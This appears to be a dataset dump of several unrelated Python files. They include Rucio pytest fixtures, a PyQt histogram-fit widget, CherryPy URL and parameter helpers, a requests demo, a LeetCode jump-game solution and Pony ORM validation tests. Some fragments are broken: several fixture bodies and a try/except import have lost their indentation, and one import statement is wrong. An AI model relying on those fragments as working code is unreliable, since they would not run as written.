def session_scope_prefix():
    """
    Generate a name prefix to be shared by objects created during this pytest session
    """
    letters = [choice(ascii_uppercase) for _ in range(6)]
    return ''.join(letters) + '-'
@pytest.fixture(scope='module')
def module_scope_prefix(request, session_scope_prefix):
    """
    Generate a name prefix to be shared by objects created during this pytest module
    Relies on pytest's builtin fixture "request"
    https://docs.pytest.org/en/6.2.x/reference.html#std-fixture-request
    """
    module_name = request.module.__name__.split('.')[-1]
    return session_scope_prefix + _del_test_prefix(module_name) + '-'
@pytest.fixture(scope='class')
def class_scope_prefix(request, module_scope_prefix):
    """Extend the module prefix with the test class name, when one exists."""
    if request.cls:
        return module_scope_prefix + _del_test_prefix(request.cls.__name__) + '-'
    return module_scope_prefix
@pytest.fixture(scope='function')
def function_scope_prefix(request, class_scope_prefix):
    """Extend the class prefix with the test function's original name."""
    return class_scope_prefix + _del_test_prefix(request.node.originalname) + '-'
@pytest.fixture(scope='session')
def vo():
    """VO name for the whole session; source depends on the test suite type."""
    if environ.get('SUITE', 'remote_dbs') != 'client':
        # Server test, we can use short VO via DB for internal tests
        from rucio.tests.common_server import get_vo
        return get_vo()
    else:
        # Client-only test, only use config with no DB config
        from rucio.tests.common import get_long_vo
        return get_long_vo()
@pytest.fixture(scope='session')
def second_vo():
    """Create (once) and return a second VO named 'new'; skip unless multi-VO is enabled."""
    from rucio.common.config import config_get_bool
    from rucio.core.vo import vo_exists, add_vo
    multi_vo = config_get_bool('common', 'multi_vo', raise_exception=False, default=False)
    if not multi_vo:
        pytest.skip('multi_vo mode is not enabled. Running multi_vo tests in single_vo mode would result in failures.')
    new_vo = 'new'
    if not vo_exists(vo=new_vo):
        add_vo(vo=new_vo, description='Test', email='rucio@email.com')
    return new_vo
@pytest.fixture(scope='session')
def long_vo():
    """Long-form VO name read from the client configuration."""
    from rucio.tests.common import get_long_vo
    return get_long_vo()
@pytest.fixture(scope='module')
def account_client():
    """Module-scoped Rucio account client."""
    from rucio.client.accountclient import AccountClient
    client = AccountClient()
    return client
@pytest.fixture(scope='module')
def replica_client():
    """Module-scoped Rucio replica client."""
    from rucio.client.replicaclient import ReplicaClient
    client = ReplicaClient()
    return client
@pytest.fixture(scope='module')
def rucio_client():
    """Module-scoped general-purpose Rucio client."""
    from rucio.client import Client
    client = Client()
    return client
@pytest.fixture(scope='module')
def did_client():
    """Module-scoped Rucio DID client."""
    from rucio.client.didclient import DIDClient
    client = DIDClient()
    return client
@pytest.fixture(scope='module')
def rse_client():
    """Module-scoped Rucio RSE client."""
    from rucio.client.rseclient import RSEClient
    client = RSEClient()
    return client
@pytest.fixture(scope='module')
def scope_client():
    """Module-scoped Rucio scope client."""
    from rucio.client.scopeclient import ScopeClient
    client = ScopeClient()
    return client
@pytest.fixture(scope='module')
def dirac_client():
    """Module-scoped Rucio Dirac client."""
    from rucio.client.diracclient import DiracClient
    client = DiracClient()
    return client
@pytest.fixture
def rest_client():
    """Flask test client for the Rucio REST API that logs every request and response."""
    from rucio.tests.common import print_response
    from flask.testing import FlaskClient
    from rucio.web.rest.flaskapi.v1.main import application
    class WrappedFlaskClient(FlaskClient):
        def __init__(self, *args, **kwargs):
            super(WrappedFlaskClient, self).__init__(*args, **kwargs)
        def open(self, path='/', *args, **kwargs):
            # Echo the request line, then the response, for easier test debugging.
            print(kwargs.get('method', 'GET'), path)
            response = super(WrappedFlaskClient, self).open(path, *args, **kwargs)
            try:
                print_response(response)
            except Exception:
                # Logging must never break the test itself.
                traceback.print_exc()
            return response
    # Save the current flag so it can be restored after the test.
    _testing = application.testing
    application.testing = True
    application.test_client_class = WrappedFlaskClient
    with application.test_client() as client:
        yield client
    # Teardown: restore the application's previous test configuration.
    application.test_client_class = None
    application.testing = _testing
@pytest.fixture
def auth_token(rest_client, long_vo):
    """Authenticate as root via userpass and return the auth token string."""
    from rucio.tests.common import vohdr, headers, loginhdr
    response = rest_client.get('/auth/userpass', headers=headers(loginhdr('root', 'ddmlab', 'secret'), vohdr(long_vo)))
    assert response.status_code == 200
    auth_token = response.headers.get('X-Rucio-Auth-Token')
    assert auth_token
    return str(auth_token)
@pytest.fixture(scope='module')
def mock_scope(vo):
from rucio.common.types import InternalScope
return InternalScope('mock', vo=vo)
@pytest.fixture(scope='module')
def test_scope(vo):
from rucio.common.types import InternalScope
return InternalScope('test', vo=vo)
@pytest.fixture(scope='module')
def root_account(vo):
    """The 'root' account, internalised for the current VO."""
    from rucio.common.types import InternalAccount
    return InternalAccount('root', vo=vo)
@pytest.fixture(scope='module')
def jdoe_account(vo):
    """The 'jdoe' test account, internalised for the current VO."""
    from rucio.common.types import InternalAccount
    return InternalAccount('jdoe', vo=vo)
@pytest.fixture
def random_account(vo):
    """Create a throwaway USER account with a random name; delete it on teardown.

    Dependent DB rows are cleaned up before the account itself is removed.
    """
    import random
    import string
    from rucio.common.types import InternalAccount
    from rucio.core.account import add_account, del_account
    from rucio.db.sqla import models
    from rucio.db.sqla.constants import AccountType
    from rucio.tests.common_server import cleanup_db_deps
    account = InternalAccount(''.join(random.choice(string.ascii_uppercase) for _ in range(10)), vo=vo)
    add_account(account=account, type_=AccountType.USER, email=f'{account.external}@email.com')
    yield account
    # Teardown: remove rows referencing the account first, then the account.
    cleanup_db_deps(model=models.Account, select_rows_stmt=models.Account.account == account)
    del_account(account)
@pytest.fixture(scope="module")
def containerized_rses(rucio_client):
    """
    Detects if containerized rses for xrootd & ssh are available in the testing environment.
    :return: A list of (rse_name, rse_id) tuples.
    """
    from rucio.common.exception import InvalidRSEExpression
    rses = []
    try:
        # RSEs tagged test_container_xrd whose name also contains "xrd".
        xrd_rses = [x['rse'] for x in rucio_client.list_rses(rse_expression='test_container_xrd=True')]
        xrd_rses = [rucio_client.get_rse(rse) for rse in xrd_rses]
        xrd_containerized_rses = [(rse_obj['rse'], rse_obj['id']) for rse_obj in xrd_rses if "xrd" in rse_obj['rse'].lower()]
        xrd_containerized_rses.sort()
        rses.extend(xrd_containerized_rses)
        # Likewise for the ssh-based container RSEs.
        ssh_rses = [x['rse'] for x in rucio_client.list_rses(rse_expression='test_container_ssh=True')]
        ssh_rses = [rucio_client.get_rse(rse) for rse in ssh_rses]
        ssh_containerized_rses = [(rse_obj['rse'], rse_obj['id']) for rse_obj in ssh_rses if "ssh" in rse_obj['rse'].lower()]
        ssh_containerized_rses.sort()
        rses.extend(ssh_containerized_rses)
    except InvalidRSEExpression as invalid_rse_expression:
        # Expected outside containerized environments: return an empty list.
        print("{ex}. Note that containerized RSEs will not be available in non-containerized test environments"
              .format(ex=invalid_rse_expression))
        traceback.print_exc()
    return rses
@pytest.fixture
def rse_factory(request, vo, function_scope_prefix):
    """Yield a TemporaryRSEFactory, reusing the test's db_session if it has one."""
    from .temp_factories import TemporaryRSEFactory
    session = None
    if 'db_session' in request.fixturenames:
        session = request.getfixturevalue('db_session')
    with TemporaryRSEFactory(vo=vo, name_prefix=function_scope_prefix, db_session=session) as factory:
        yield factory
@pytest.fixture(scope="class")
def rse_factory_unittest(request, vo, class_scope_prefix):
    """
    unittest classes can get access to rse_factory fixture via this fixture
    """
    from .temp_factories import TemporaryRSEFactory
    with TemporaryRSEFactory(vo=vo, name_prefix=class_scope_prefix) as factory:
        # Attach to the class so legacy unittest methods can use self.rse_factory.
        request.cls.rse_factory = factory
        yield factory
@pytest.fixture
def did_factory(request, vo, mock_scope, function_scope_prefix, file_factory, root_account):
    """Yield a TemporaryDidFactory bound to the mock scope and root account."""
    from .temp_factories import TemporaryDidFactory
    session = None
    if 'db_session' in request.fixturenames:
        session = request.getfixturevalue('db_session')
    with TemporaryDidFactory(vo=vo, default_scope=mock_scope, name_prefix=function_scope_prefix, file_factory=file_factory,
                             default_account=root_account, db_session=session) as factory:
        yield factory
@pytest.fixture
def file_factory(tmp_path_factory):
    """Yield a TemporaryFileFactory writing under pytest's tmp path."""
    from .temp_factories import TemporaryFileFactory
    with TemporaryFileFactory(pytest_path_factory=tmp_path_factory) as factory:
        yield factory
@pytest.fixture
def scope_factory():
    """Return a callable that creates one shared-named scope per given VO."""
    from rucio.common.utils import generate_uuid
    from rucio.core.scope import add_scope
    from rucio.common.types import InternalAccount, InternalScope

    def create_scopes(vos, account_name=None):
        """Create a 'shr_<uuid>' scope in each VO; returns (name, scopes)."""
        scope_uuid = str(generate_uuid()).lower()[:16]
        scope_name = 'shr_%s' % scope_uuid
        created_scopes = []
        for vo in vos:
            scope = InternalScope(scope_name, vo=vo)
            # Owner defaults to root when no account name is supplied.
            add_scope(scope, InternalAccount(account_name if account_name else 'root', vo=vo))
            created_scopes.append(scope)
        return scope_name, created_scopes
    return create_scopes
class _TagFactory:
    """Produces sequentially numbered tags sharing a common prefix."""

    def __init__(self, prefix):
        """Remember *prefix* and start the counter at zero."""
        self.prefix = prefix
        self.index = 0

    def new_tag(self):
        """Advance the counter and return '<prefix>-<counter>'."""
        next_index = self.index + 1
        self.index = next_index
        return '{}-{}'.format(self.prefix, next_index)
@pytest.fixture
def tag_factory(function_scope_prefix):
    """Per-test tag factory; '_' is replaced since tags may forbid underscores."""
    return _TagFactory(prefix=f'{function_scope_prefix}{"".join(choice(ascii_uppercase) for _ in range(6))}'.replace('_', '-'))
@pytest.fixture(scope='class')
def tag_factory_class(class_scope_prefix):
    """Class-scoped variant of tag_factory sharing one prefix per test class."""
    return _TagFactory(prefix=f'{class_scope_prefix}{"".join(choice(ascii_uppercase) for _ in range(6))}'.replace('_', '-'))
@pytest.fixture
def db_session():
    """Yield a database session; commit and close it on teardown."""
    from rucio.db.sqla import session
    db_session = session.get_session()
    yield db_session
    db_session.commit()
    db_session.close()
def __get_fixture_param(request):
    """Return the parametrize value for *request*, or None.

    Falls back to reading the test instance's ``pytestmark`` for legacy
    unittest-style classes where ``request.param`` is not populated.
    """
    fixture_param = getattr(request, "param", None)
    if not fixture_param:
        # Parametrize support is incomplete for legacy unittest test cases
        # Manually retrieve the parameters from the list of marks:
        mark = next(iter(filter(lambda m: m.name == 'parametrize', request.instance.pytestmark)), None)
        if mark:
            # Use the first parameter set of the first parametrize mark.
            fixture_param = mark.args[1][0]
    return fixture_param
def __create_in_memory_db_table(name, *columns, **kwargs):
    """
    Create an in-memory temporary table using the sqlite memory driver.
    Make sqlalchemy aware of that table by registering it via a
    declarative base.

    :param name: table name (also used to derive constraint names).
    :param columns: sqlalchemy Column objects for the table.
    :param kwargs: optional 'table_args' tuple of extra constraints/indexes.
    :returns: a mapped class (subclass of ModelBase) bound to the sqlite engine.
    """
    import datetime
    from sqlalchemy import Column, DateTime, CheckConstraint
    from sqlalchemy.pool import StaticPool
    from sqlalchemy.schema import Table
    from sqlalchemy.orm import registry
    from rucio.db.sqla.models import ModelBase
    from rucio.db.sqla.session import get_maker, create_engine
    # StaticPool + check_same_thread=False: one shared in-memory connection.
    engine = create_engine('sqlite://', connect_args={'check_same_thread': False}, poolclass=StaticPool)
    # Create a class which inherits from ModelBase. This will allow us to use the rucio-specific methods like .save()
    DeclarativeObj = type('DeclarativeObj{}'.format(name), (ModelBase,), {})
    # Create a new declarative base and map the previously created object into the base
    mapper_registry = registry()
    InMemoryBase = mapper_registry.generate_base(name='InMemoryBase{}'.format(name))
    # Mirror the standard rucio audit columns and NOT NULL checks.
    table_args = tuple(columns) + tuple(kwargs.get('table_args', ())) + (
        Column("created_at", DateTime, default=datetime.datetime.utcnow),
        Column("updated_at", DateTime, default=datetime.datetime.utcnow, onupdate=datetime.datetime.utcnow),
        CheckConstraint('CREATED_AT IS NOT NULL', name=name.upper() + '_CREATED_NN'),
        CheckConstraint('UPDATED_AT IS NOT NULL', name=name.upper() + '_UPDATED_NN'),
    )
    table = Table(
        name,
        InMemoryBase.metadata,
        *table_args
    )
    mapper_registry.map_imperatively(DeclarativeObj, table)
    # Perform actual creation of the in-memory table
    InMemoryBase.metadata.create_all(engine)
    # Register the new table with the associated engine into the sqlalchemy sessionmaker
    # In theory, this code must be protected by rucio.db.scla.session._LOCK, but this code will be executed
    # during test case initialization, so there is no risk here to have concurrent calls from within the
    # same process
    senssionmaker = get_maker()
    senssionmaker.kw.setdefault('binds', {}).update({DeclarativeObj: engine})
    return DeclarativeObj
@pytest.fixture
def message_mock():
    """
    Fixture which overrides the Message table with a private instance
    """
    from unittest import mock
    from sqlalchemy import Column
    from rucio.common.utils import generate_uuid
    from rucio.db.sqla.models import String, PrimaryKeyConstraint, CheckConstraint, Text, Index, GUID
    # Random suffix keeps parallel tests from clashing on the table name.
    InMemoryMessage = __create_in_memory_db_table(
        'message_' + generate_uuid(),
        Column('id', GUID(), default=generate_uuid),
        Column('event_type', String(256)),
        Column('payload', String(4000)),
        Column('payload_nolimit', Text),
        Column('services', String(256)),
        table_args=(PrimaryKeyConstraint('id', name='MESSAGES_ID_PK'),
                    CheckConstraint('EVENT_TYPE IS NOT NULL', name='MESSAGES_EVENT_TYPE_NN'),
                    CheckConstraint('PAYLOAD IS NOT NULL', name='MESSAGES_PAYLOAD_NN'),
                    Index('MESSAGES_SERVICES_IDX', 'services', 'event_type'))
    )
    # Redirect core message code to the private table for this test only.
    with mock.patch('rucio.core.message.Message', new=InMemoryMessage):
        yield
@pytest.fixture
def core_config_mock(request):
    """
    Fixture to allow having per-test core.config tables without affecting the other parallel tests.
    This override works only in tests which use core function calls directly, not in the ones working
    via the API, because the normal config table is not touched and the rucio instance answering API
    calls is not aware of this mock.
    This fixture acts by creating a new copy of the "config" sql table using the :memory: sqlite engine.
    Accesses to the "models.Config" table are then redirected to this temporary table via mock.patch().
    """
    from unittest import mock
    from sqlalchemy import Column
    from rucio.common.utils import generate_uuid
    from rucio.db.sqla.models import String, PrimaryKeyConstraint
    from rucio.db.sqla.session import get_session
    # Get the fixture parameters
    table_content = []
    params = __get_fixture_param(request)
    if params:
        table_content = params.get("table_content", table_content)
    InMemoryConfig = __create_in_memory_db_table(
        'configs_' + generate_uuid(),
        Column('section', String(128)),
        Column('opt', String(128)),
        Column('value', String(4000)),
        table_args=(PrimaryKeyConstraint('section', 'opt', name='CONFIGS_PK'),),
    )
    # Fill the table with the requested mock data
    session = get_session()()
    for section, option, value in (table_content or []):
        InMemoryConfig(section=section, opt=option, value=value).save(flush=True, session=session)
    session.commit()
    with mock.patch('rucio.core.config.models.Config', new=InMemoryConfig):
        yield
@pytest.fixture
def file_config_mock(request):
    """
    Fixture which allows to have an isolated in-memory configuration file instance which
    is not persisted after exiting the fixture.
    This override works only in tests which use config calls directly, not in the ones working
    via the API, as the server config is not changed.
    """
    from unittest import mock
    from rucio.common.config import Config, config_set, config_has_section, config_add_section
    # Get the fixture parameters
    overrides = []
    params = __get_fixture_param(request)
    if params:
        overrides = params.get("overrides", overrides)
    # Fresh Config instance; the patch makes all config reads use it.
    parser = Config().parser
    with mock.patch('rucio.common.config.get_config', side_effect=lambda: parser):
        for section, option, value in (overrides or []):
            if not config_has_section(section):
                config_add_section(section)
            config_set(section, option, value)
        yield
@pytest.fixture
def caches_mock(request):
    """
    Fixture which overrides the different internal caches with in-memory ones for the duration
    of a particular test.
    This override works only in tests which use core function calls directly, not in the ones
    working via API.
    The fixture acts by mock.patching the REGION object in the provided list of modules to mock.
    """
    from unittest import mock
    from contextlib import ExitStack
    from dogpile.cache import make_region
    caches_to_mock = []
    expiration_time = 600
    params = __get_fixture_param(request)
    if params:
        caches_to_mock = params.get("caches_to_mock", caches_to_mock)
        expiration_time = params.get("expiration_time", expiration_time)
    # ExitStack unwinds every patch at the end of the with block.
    with ExitStack() as stack:
        mocked_caches = []
        for module in caches_to_mock:
            region = make_region().configure('dogpile.cache.memory', expiration_time=expiration_time)
            stack.enter_context(mock.patch(module, new=region))
            mocked_caches.append(region)
        yield mocked_caches
@pytest.fixture
def metrics_mock():
    """
    Overrides the prometheus metric registry and allows to verify if the desired
    prometheus metrics were correctly recorded.
    """
    from unittest import mock
    from prometheus_client import CollectorRegistry, values
    # Fresh registry plus cleared metric caches; MutexValue avoids the
    # multiprocess value backend during tests.
    with mock.patch('rucio.core.monitor.REGISTRY', new=CollectorRegistry()) as registry, \
            mock.patch('rucio.core.monitor.COUNTERS', new={}), \
            mock.patch('rucio.core.monitor.GAUGES', new={}), \
            mock.patch('rucio.core.monitor.TIMINGS', new={}), \
            mock.patch('prometheus_client.values.ValueClass', new=values.MutexValue):
        yield registry
|
5,668 | aa51b2d4bfe4051f3302d14cf2123a3881a8a2e3 | import cpt_tools
from gui_helpers.gui_config import *
chisqr_str = '\u03c72'
mu_str = '\u03bc'
sigma_str = '\u03c3'
class FitWidget( object ) :
    """Table-based control panel for fitting peaks in the plotter's histograms.

    One table row per histogram: Fit / Delete buttons, left/right fit-bound
    entries, and read-only labels for the fitted parameters
    (A, mu, sigma, reduced chi^2).
    """

    def __init__( self, plotter_widget, analyzer = None ) :
        self.plotter_widget = plotter_widget
        self.plotter = plotter_widget.plotter
        self.hists = self.plotter.all_hists
        self.layout = QVBoxLayout()
        # Columns: Fit | Delete | Left bound | Right bound | A | mu | sigma | chi^2
        params_labels = [ 'A', mu_str, sigma_str, chisqr_str ]
        self.num_params = len( params_labels )
        h_labels = [ '', '', 'Left', 'Right' ]
        h_labels.extend( params_labels )
        v_labels = [ x.title for x in self.hists ]
        nrows = len( v_labels )
        ncols = len( h_labels )
        self.table = QTableWidget( nrows, ncols )
        self.table.setMinimumWidth( 400 )
        self.table.setMinimumHeight(100)
        self.table.horizontalHeader().setSectionResizeMode( QHeaderView.Stretch )
        self.table.verticalHeader().setSectionResizeMode( QHeaderView.Stretch )
        self.table.setHorizontalHeaderLabels( h_labels )
        self.table.setVerticalHeaderLabels( v_labels )
        self.bounds_entries = []
        self.params_labels = []
        self.fit_buttons = []
        self.delete_buttons = []
        for i in range( len( self.hists ) ) :
            self.bounds_entries.append( [ QLineEdit(), QLineEdit() ] )
            self.params_labels.append( [ QLabel() for _ in range( self.num_params ) ] )
            self.fit_buttons.append( QPushButton( 'Fit' ) )
            self.delete_buttons.append( QPushButton( 'Delete' ) )
            # Bind the row index via a default argument so every button
            # refers to its own row, not the final value of i.
            self.fit_buttons[i].clicked.connect( lambda state, a=i : self.fit_button_clicked( a ) )
            self.delete_buttons[i].clicked.connect( lambda state, a=i : self.delete_button_clicked( a ) )
            self.table.setCellWidget( i, 0, self.fit_buttons[i] )
            self.table.setCellWidget( i, 1, self.delete_buttons[i] )
            self.table.setCellWidget( i, 2, self.bounds_entries[i][0] )
            self.table.setCellWidget( i, 3, self.bounds_entries[i][1] )
            for j in range( self.num_params ) :
                self.table.setCellWidget( i, 4 + j, self.params_labels[i][j] )
        self.layout.addWidget( self.table )

    def fit_button_clicked( self, i ) :
        """Fit histogram *i* within the user-entered bounds and show results.

        Returns the fit object on success, otherwise None.
        """
        print( self.bounds_entries[i][0].text() )
        try :
            left_x_bound = float( self.bounds_entries[i][0].text() )
            right_x_bound = float( self.bounds_entries[i][1].text() )
        except ValueError :
            # Bug fix: this was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit; only invalid floats are expected.
            print( 'WARNING: please specify bounds for fit' )
            return
        bounds = [ left_x_bound, right_x_bound ]
        fit = self.hists[i].apply_fit( bounds )
        if fit is None :
            print( 'ERROR: fit failed' )
            return
        self.set_fit_params( fit, i )
        self.plotter.update_all()
        self.plotter_widget.reload_visualization_params()
        return fit

    def set_fit_params( self, fit, i ) :
        """Display the parameters of *fit* in row *i*; clear the row if None."""
        if fit is None :
            for j in range( self.num_params ) :
                self.params_labels[i][j].setText( '' )
            return
        params = fit.params
        params_errors = fit.params_errors
        redchisqr = fit.redchisqr
        # 'value +/- error' when errors are available, plain value otherwise.
        if params_errors is not None :
            labels = [ '%.1f\u00b1%.1f' % ( params[j], params_errors[j] ) for j in range( len(params) ) ]
        else :
            labels = [ '%.1f' % params[j] for j in range( len(params) ) ]
        labels.append( '%.1f' % redchisqr )
        for j in range( len(params) + 1 ) :
            self.params_labels[i][j].setText( labels[j] )

    def delete_button_clicked( self, i ) :
        """Remove any existing fit from histogram *i*."""
        self.hists[i].remove_fit()
|
5,669 | dc28d8aa17347f07041ae218bbe4e1b0add27c24 | import cherrypy
import config
try:
from simplejson import json
except ImportError:
import json
import routes
import urllib
import re
def redirect(url, status=None):
    """Raise a redirect to the specified address.

    Raises cherrypy.HTTPRedirect, which CherryPy converts into the
    HTTP redirect response (using *status* if given).
    """
    raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
    """Reject the current request unless its HTTP method is allowed.

    GET implies HEAD.  On a mismatch, sets the ``Allow`` response header
    and raises a 405 Method Not Allowed error.
    """
    methods = list(allowed_methods)
    if "GET" in methods and "HEAD" not in methods:
        methods.append("HEAD")
    methods.sort()
    if cherrypy.request.method not in methods:
        cherrypy.response.headers['Allow'] = ", ".join(methods)
        raise cherrypy.HTTPError(405)
def gonext():
    """Redirect to the url specified by the "next" parameter, if there is one.
    """
    target = cherrypy.request.params.get('next', '')
    if target != '':
        redirect(target)
def url(*args, **kwargs):
    """Get the url for a given route.

    Keyword arguments follow a three-layer override scheme:
    'oldNAME' values are defaults, plain 'NAME' values override them, and
    'newNAME' values override both.  A value of None removes the parameter.
    ('static', ...) routes are served from STATIC_ASSETS_URL instead.
    """
    if len(args) == 0 and len(kwargs) == 0:
        return cherrypy.url()
    # First read the old args
    newkwargs = dict(
        (k, v[3:]) for (k, v) in kwargs.iteritems()
        if v is not None and k.startswith('old')
    )
    # NOTE(review): the 'old' layer stores v[3:], i.e. the value with its
    # first three characters stripped -- confirm callers pass values
    # prefixed accordingly.
    # Apply neither new nor old args
    for (k, v) in kwargs.iteritems():
        if k.startswith('new') or k.startswith('old'):
            continue
        if v is None:
            try:
                del newkwargs[k]
            except KeyError: pass
        else:
            newkwargs[k] = v
    # Apply new args
    for (k, v) in kwargs.iteritems():
        if k[:3] != 'new':
            continue
        k = k[3:]
        if v is None:
            try:
                del newkwargs[k]
            except KeyError: pass
        else:
            newkwargs[k] = v
    # Static assets bypass the routing table entirely.
    if len(args) > 0 and args[0] == 'static':
        return config.STATIC_ASSETS_URL + '/'.join(args[1:])
    return cherrypy.url(routes.url_for(*args, **newkwargs))
def queryparams(*args, **kwargs):
    """Encode a set of arguments as query parameters.

    Positional arguments must be (key, value) pairs; keyword arguments
    override pairs that share a key.
    """
    merged = dict(args)
    merged.update(kwargs)
    return urllib.urlencode(merged)
def get_or_404(cls, id):
    """Fetch the *cls* object with the given id, or raise HTTP 404."""
    try:
        return cls.objects.get(unicode(id))
    except KeyError:
        raise cherrypy.NotFound
def locked(fn):
    """Decorator to ensure that the mutex is locked while calling a method.
    The method's object must have a mutex in a property named "mutex".
    """
    import functools

    @functools.wraps(fn)  # fix: preserve the wrapped method's name/docstring
    def locked_method(self, *args, **kwargs):
        self.mutex.acquire()
        try:
            return fn(self, *args, **kwargs)
        finally:
            # Always release, even when fn raises.
            self.mutex.release()
    return locked_method
def get_user():
    """Return the singleton User (id '_'), creating it on first access."""
    from apps.store.models import User
    try:
        user = User.objects.get(u'_')
    except KeyError:
        # First access: create and persist the singleton.
        user = User(None)
        user.id = u'_'
        User.objects.set(user)
    return user
def get_settings():
    """Return the singleton Settings (id '_'), creating it with defaults."""
    from apps.store.models import Settings
    try:
        settings = Settings.objects.get(u'_')
    except KeyError:
        # First access: create with the default media roots and persist.
        settings = Settings(None)
        settings.id = u'_'
        settings.set_roots(config.default_media_roots)
        Settings.objects.set(settings)
    return settings
def listify(val):
    """Convert a value, as found in cherrypy parameters, into a list.

    Strings become one-element lists, other iterables are copied into a
    new list, and anything else is wrapped in a one-element list.
    """
    if isinstance(val, basestring):
        result = [val]
    elif hasattr(val, '__iter__'):
        result = list(val)
    else:
        result = [val]
    return result
def listify_values(params):
    """Return a copy of a dict with values which were strings converted to
    lists.
    """
    converted = {}
    for key, value in params.iteritems():
        converted[key] = listify(value)
    return converted
def getparam(name, default=None, stash=None, params=None):
    """Get a query parameter, in a nice standardised way, with some special
    handling for old and new values.

    Returns a single value (the first found) or *default* when the
    parameter is absent.  See getparamlist() for the lookup rules.
    """
    values = getparamlist(name, stash=stash, params=params)
    if values:
        return values[0]
    return default
def getintparam(name, default=None, stash=None, params=None):
    """Like getparam(), but the returned value is coerced to an int.

    Returns *default* unchanged when the parameter is absent.
    """
    values = getparamlist(name, stash=stash, params=params)
    if values:
        return int(values[0])
    return default
_GETPARAMLIST_NO_DEFAULT = object()  # sentinel: distinguishes "no default given"

def getparamlist(name, default=_GETPARAMLIST_NO_DEFAULT, stash=None, params=None):
    """Get a query parameter, in a nice standardised way, with some special
    handling for old and new values.

    Lookup order: "new<name>", then "<name>", then "old<name>".  Returns a
    list of values, or *default* (a fresh empty list when not supplied)
    if the parameter is absent.  When *stash* is given, the found values
    are also recorded there under str(*name*).

    Bug fix: the default used to be a shared mutable list ([]); any caller
    mutating the returned value corrupted it for every later call.  A new
    list is now created per call (explicitly passed defaults behave as
    before).
    """
    if default is _GETPARAMLIST_NO_DEFAULT:
        default = []
    if params is None:
        params = cherrypy.request.params
    v = params.get("new" + name, None)
    if v is None:
        v = params.get(name, None)
    if v is None:
        v = params.get("old" + name, None)
    if v is None:
        return default
    v = listify(v)
    if stash is not None:
        stash[str(name)] = v
    return v
def getorderparam(name):
    """Get the sequence of numbers stored in a parameter.

    The parameter should contain the numbers separated by commas; blank
    entries are skipped.  Raises HTTP 400 on any non-numeric entry.
    """
    raw = cherrypy.request.params.get(name, '')
    for piece in raw.split(','):
        piece = piece.strip()
        if not piece:
            continue
        try:
            yield int(piece)
        except ValueError:
            raise cherrypy.HTTPError(400)
def jsonresp(value):
    """Return a json formatted value, and set appropriate headers.

    The body is returned as a one-element tuple, as CherryPy expects.
    """
    cherrypy.response.headers['Content-Type'] = 'application/json'
    return (json.dumps(value),)
def slugify(value):
    """Turn *value* into a URL-safe slug.

    Accents are stripped via NFKD normalisation, punctuation becomes
    underscores, and whitespace/hyphen runs collapse to single hyphens.
    """
    import unicodedata
    ascii_text = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
    cleaned = unicode(re.sub('[^\w\s\.-]', '_', ascii_text).strip().lower())
    return re.sub('[-\s]+', '-', cleaned)
|
5,670 | 325770130473153d092d3058587e9666625e12d0 | # coding=utf-8
"""
@Author: Freshield
@Contact: yangyufresh@163.com
@File: a1_test_call.py
@Time: 2021-01-20 17:40
@Last_update: 2021-01-20 17:40
@Desc: None
@==============================================@
@ _____ _ _ _ _ @
@ | __|___ ___ ___| |_|_|___| |_| | @
@ | __| _| -_|_ -| | | -_| | . | @
@ |__| |_| |___|___|_|_|_|___|_|___| @
@ Freshield @
@==============================================@
"""
import requests
import json
# Simple GET request.  NOTE(review): the first assignment below is dead --
# it is immediately overwritten by the search URL on the next line.
url = 'https://www.baidu.com'
url = 'http://www.baidu.com/s?wd=python'
r = requests.get(url)
print(r.url)
print(r.text)
# Same search, but letting requests build the query string from `params`.
url = 'http://www.baidu.com/s'
params = {'wd': 'python'}
r = requests.get(url, params=params)
print(r.text)
print(r.url)
# POST a JSON-encoded body (sent as a raw string, not as form fields).
data = {'key1': 'value1', 'key2': 'value2'}
data = json.dumps(data)
r = requests.post('https://www.baidu.com', data=data)
print(r.text)
print(r)
5,671 | 7f2ffa653486d000c9eee0087fc1e6ca0c84003c | class Solution:
def jump(self, nums: List[int]) -> int:
if len(nums) < 2: return 0
jump = 1
curr_max = max_reach = nums[0]
for i in range(1, len(nums)):
if max_reach >= len(nums) - 1:
return jump
curr_max = max(curr_max, i + nums[i])
if i == max_reach:
max_reach = curr_max
jump += 1
return jump
# TC: O(n)
# n is the len(nums), as we only scan the list once
# SC: O(1)
# we only init 3 variables, thus space is constant
|
5,672 | 33c39b098cb9d3368b8f74a7433e0943fe252da5 | import unittest, warnings
from pony.orm import *
from pony.orm import core
from pony.orm.tests.testutils import raises_exception
# In-memory SQLite database shared by all tests in this module.
db = Database('sqlite', ':memory:')

class Person(db.Entity):
    # Entity with a Required name so the tests can exercise how Pony
    # reports NULL / empty-string values loaded into a Required attribute.
    id = PrimaryKey(int)
    name = Required(str)
    tel = Optional(str)

# check_tables=False: the table is created by hand below WITHOUT a
# NOT NULL constraint on name, so invalid empty values can be inserted.
db.generate_mapping(check_tables=False)
with db_session:
    db.execute("""
    create table Person(
        id int primary key,
        name text,
        tel text
    )
    """)

# Escalate all warnings to errors by default; individual tests relax this
# for DatabaseContainsIncorrectEmptyValue as needed.
warnings.simplefilter('error', )
class TestValidate(unittest.TestCase):
    """Warnings raised when the DB holds empty/NULL values for Required attrs."""

    @db_session
    def setUp(self):
        # Wipe the table and clear previously-issued
        # DatabaseContainsIncorrectEmptyValue entries from the warning
        # registry so each test's 'error'/'ignore' filter fires afresh.
        db.execute('delete from Person')
        registry = getattr(core, '__warningregistry__', {})
        for key in list(registry):
            if type(key) is not tuple: continue
            text, category, lineno = key
            if category is DatabaseContainsIncorrectEmptyValue:
                del registry[key]

    @db_session
    def test_1a(self):
        # Empty string in a Required column is readable when the warning
        # is ignored.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DatabaseContainsIncorrectEmptyValue)
            db.insert('Person', id=1, name='', tel='111')
            p = Person.get(id=1)
            self.assertEqual(p.name, '')

    @raises_exception(DatabaseContainsIncorrectEmptyValue,
                      'Database contains empty string for required attribute Person.name')
    @db_session
    def test_1b(self):
        # Same data, but with warnings-as-errors the load must raise.
        with warnings.catch_warnings():
            warnings.simplefilter('error', DatabaseContainsIncorrectEmptyValue)
            db.insert('Person', id=1, name='', tel='111')
            p = Person.get(id=1)

    @db_session
    def test_2a(self):
        # NULL in a Required column is readable when the warning is ignored.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', DatabaseContainsIncorrectEmptyValue)
            db.insert('Person', id=1, name=None, tel='111')
